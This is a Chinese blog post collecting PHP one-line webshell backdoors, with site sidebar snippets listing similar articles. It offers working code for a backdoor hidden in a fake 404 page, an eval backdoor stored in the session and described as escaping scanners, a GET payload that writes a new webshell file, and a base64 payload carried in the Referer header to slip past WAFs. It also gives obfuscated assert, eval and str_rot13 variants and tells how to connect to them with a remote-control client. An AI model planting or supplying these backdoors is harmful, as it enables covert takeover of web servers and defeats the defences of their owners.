php一句话后门,PHP一句话后门集锦

最新推荐文章于 2024-04-17 06:30:00 发布
最新推荐文章于 2024-04-17 06:30:00 发布
阅读量676 收藏
点赞数
文章标签: php一句话后门

404页面的利用:

404 Not Found

Not Found

The requested URL was not found on this server.

@preg_replace("/[pageerror]/e",$_POST['error'],"saft");

header('HTTP/1.1 404 Not Found');

?>

404页面是网站常用的文件,一般建议好后很少有人会去对它进行检查修改,这时我们可以利用这一点进行隐藏后门。

无特征隐藏后门:

session_start();

$_POST['code'] && $_SESSION['theCode'] = trim($_POST['code']);

$_SESSION['theCode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_SESSION[\'theCode\']))','a');

将$_POST['code']的内容赋值给$_SESSION['theCode'],然后执行$_SESSION['theCode'],亮点是没有特征码。用扫描工具来检查代码将无法检查到。

利用GET函数构成后门:

利用方法:

?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

执行后当前目录生成c.php一句话木马,当传参a为eval时会报错木马生成失败,为assert时同样报错,但会生成木马。

层级请求,编码运行PHP后门:

此方法用两个文件实现。

文件1:

//1.php

header('Content-type:text/html;charset=utf-8');

parse_str($_SERVER['HTTP_REFERER'], $a);

if(reset($a) == '10' && count($a) == 9) {

eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));

}

文件2:

//2.php

header('Content-type:text/html;charset=utf-8');

//要执行的代码

$code = <<

phpinfo();

CODE;

//进行base64编码

$code = base64_encode($code);

//构造referer字符串

$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";

//后门url

$url = 'http://localhost/test1/1.php';

$ch = curl_init();

$options = array(

CURLOPT_URL => $url,

CURLOPT_HEADER => FALSE,

CURLOPT_RETURNTRANSFER => TRUE,

CURLOPT_REFERER => $referer

);

curl_setopt_array($ch, $options);

echo curl_exec($ch);

通过HTTP请求中的HTTP_REFERER来运行经过base64编码的代码,来达到后门的效果,一般waf(Web Application Firewall / Web应用防护系统)对referer这些检测要松一点,或者没有检测。用这个思路bypass waf不错。

三个变形的一句话PHP木马:

1、<?php ($_=@$_GET[2]).@$_($_POST[1])?>

菜刀连接http://site/1.php?2=assert ,密码为1。

2、<?php

$_="";

$_[+""]='';

$_="$_"."";

$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");

?>

在菜刀里写http://site/2.php?_=assert&__=eval($_POST['pass']) 密码是pass。如果你用菜刀的附加数据的话更隐蔽,或者用其它注射工具也可以,因为是post提交的。

3、($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');

str_rot13(‘riny’)即编码后的eval,完全避开了关键字。

其他一些PHP一句话木马后门:

//典型一句话

$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$hh("/[discuz]/e",$_POST['h'],"Access");

//菜刀一句话

$filename=$_GET['xbid'];

include ($filename);

//危险的include函数,直接编译任何文件为php格式运行

$reg="c"."o"."p"."y";

$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);

//重命名任何文件

$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$gzid("/[discuz]/e",$_POST['h'],"Access");

//菜刀一句话

include ($uid);

//危险的include函数,直接编译任何文件为php格式运行,POST www.xxx.com/index.php?uid=/home/www/bbs/image.gif

//gif插一句话

//绕过<?限制的一句话

//使用lanker一句话客户端的专家模式执行相关的php语句

@preg_replace("/[email]/e",$_POST['h'],"error");

?>

//使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入h=@eval_r($_POST1);

毕须喝芮幸冰咖啡
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP免殺一句話
01-20
免殺一句話 使用ascii算法 range(1,200);$b=chr($a[96]).chr($a[114]).chr($a[114]).chr($a[100]).chr($a [113]).chr($a[115]);
.user.ini文件构成的PHP后门(转)
weixin_30906425的博客
12-29 325
phith0n · 2014/10/30 10:51 0x00 背景 这个估计很多同学看了不屑,认为是烂大街的东西了: .htaccess文件构成的PHP后门 那么我来个新的吧:.user.ini。它比.htaccess用的更广,不管是 nginx/apache/IIS,只要是以fastcgi运行的php都可以用这个方法。我的nginx服务器全部是fpm/fastcgi,我的...
PHP一句木马
最新发布
Code-5的博客
04-17 959
4. 上图中显示sql出错了,但是没有关系,我们可以在文件中看到attack.txt已经生成了。WebShell 是一种在 Web 服务器上运行的脚本或程序,可用于远程控制和管理服务器。保护 Web 服务器的安全对于确保网站和用户数据的安全至关重要。3. 利用文件导入的方式进行注入。
那些强悍的PHP一句后门
weixin_30338461的博客
05-11 1972
这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句木马。 利用404页面隐藏PHP小马: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 ...
PHP一句木马后门
chuangqudiao9845的博客
03-23 2468
在我们进行渗透测试的最后阶段,入侵到内网里,无论是想要浏览网站结构,还是抓取数据库,或者是挂个木马等等,到最后最常用的就是执行一句木马,从客户端轻松连接服务器。 一句木马的原理很简单,造型也很简单,所以造成了它理解起来容易,抵御起来也容易。于是黑白的较量变成了黑帽不断的构造变形的后门,去...
php一句后门学习(含免杀)
qq_50854662的博客
05-21 1095
php一句后门 开发很久的可利用函数 eval和assert php任意代码执行的一句后门,我们喜欢用的是传统的eval,php5,7通用。 <?php @eval($_POST['a']) ?> 但由于eval不能拆分,早期也有人喜欢用assert,这样通过编码和拆分assert,隐蔽性更高 <?php @assert($_POST['a']) ?> 虽然有人说assert在php7.0及其以上版本被禁用,但实际上并没有禁用,而是和eval一样禁止拆分了。 绝大部分一
php实现批量查询清除一句后门的代码
10-30
一句后门一般简单,容易隐藏危害大,查找麻烦等。今天发现了这个Xall.php专门批量查询干掉一句后门的代码,大家可以省去不少麻烦了
PHP隐形一句后门,和ThinkPHP框架加密码程序(base64_decode)
10-28
这是一个典型的PHP一句后门,它通过`eval`函数执行POST请求中的`c`参数所携带的任意PHP代码。当用户提交带有恶意代码的POST请求时,这个后门就会执行这些代码,从而可能导致服务器被黑客控制。 接下来,代码展示...
lanker 一句php后门客户端
06-04
lanker一句php后门客户端
lanker一句PHP后门客户端3.0内部版
09-18
lanker一句PHP后门客户端3.0内部版
PHP一句后门
xyang
05-26 3088
404 Not Found Not Found The requested URL was not found on this server. <?php @preg_replace("/[pageerror]/e",$_POST['error'],"saft"); header('HTTP/1.1 404 Not Found'); ?>
php的一句后门是哪个,PHP一句后门
weixin_33873270的博客
03-28 219
1、利用404页面隐藏一句404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replace("/[pageerror]/e",$_POST['error'],"saft");header('HTTP/1.1 404 Not Found');?>2、无特征隐藏一句session_start(...
暗组免杀php,那些强悍的PHP一句后门
weixin_33023513的博客
03-09 393
以一个学习的心态来对待PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句木马。利用404页面隐藏PHP小马PHP1234567891011404 Not FoundNot FoundThe requested URL ...
php一句大全,[各种一句木马大全]各种一句
weixin_39995351的博客
03-11 8461
PHP一句:1、普通一句2、防爆破一句 //菜刀地址http://192.168.64.137/x.php?x=mytest 密码:pass3、过狗一句 //菜刀地址 http://localhost/1.php?s=assert等价于$=@$GET['s'];@$($_POST['pass']);?>4、404隐藏一句preg_replace()方法中的e,只适用于php5及更早...
php超强后门在任意位置创建文件,web后门 那些强悍猥琐流的PHP一句后门大全分享...
weixin_36094492的博客
03-09 455
强悍的PHP一句后门这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句木马。利用404页面隐藏PHP小马:复制代码代码如下:404 Not FoundNot FoundThe requested URL was not found on this server.@preg_replac...
最新php一句
收集盒 Book box
10-28 792
第一种:1.php $_=@$_GET[2]).@$_($_GET[1])?> 在菜刀里写http://127.0.0.1/1.php?2=assert密码是1 第二种2.php $_=""; $_[+""]=''; $_="$_".""; $_=($_[+""]|"").($_[+""]|"").($_[+""]^""); ?> 在菜刀里写 http://127.
怎么使用php后门,PHP后门的一些用法
weixin_36078790的博客
03-29 493
今天我们说一些最常见的PHP后门的一些用法首先,写一个最简单的后门,也可以叫做木马。
一句木马:PHP
09-20 142
珍藏版: 一个简单的过D盾的免杀php <?php $ab = $_REQUEST['d']; $a['t'] = "";//主要带对象 D盾就不管后面的了。。。 eval($a['t'].$ab); 过狗过D盾 <?php $a = $_REQUEST['d'];//参数 $a = "$a";//狗不会二次检测 $b['test...
如何使用 msfvenom创造一个php后门
04-07
3. 运行命令后,将创建一个名为`backdoor.php`的文件,其中包含Meterpreter反向TCP Shell的payload。 4. 上传`backdoor.php`到目标服务器。 5. 打开Meterpreter会,输入以下命令: ``` php backdoor.php ``` 6...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值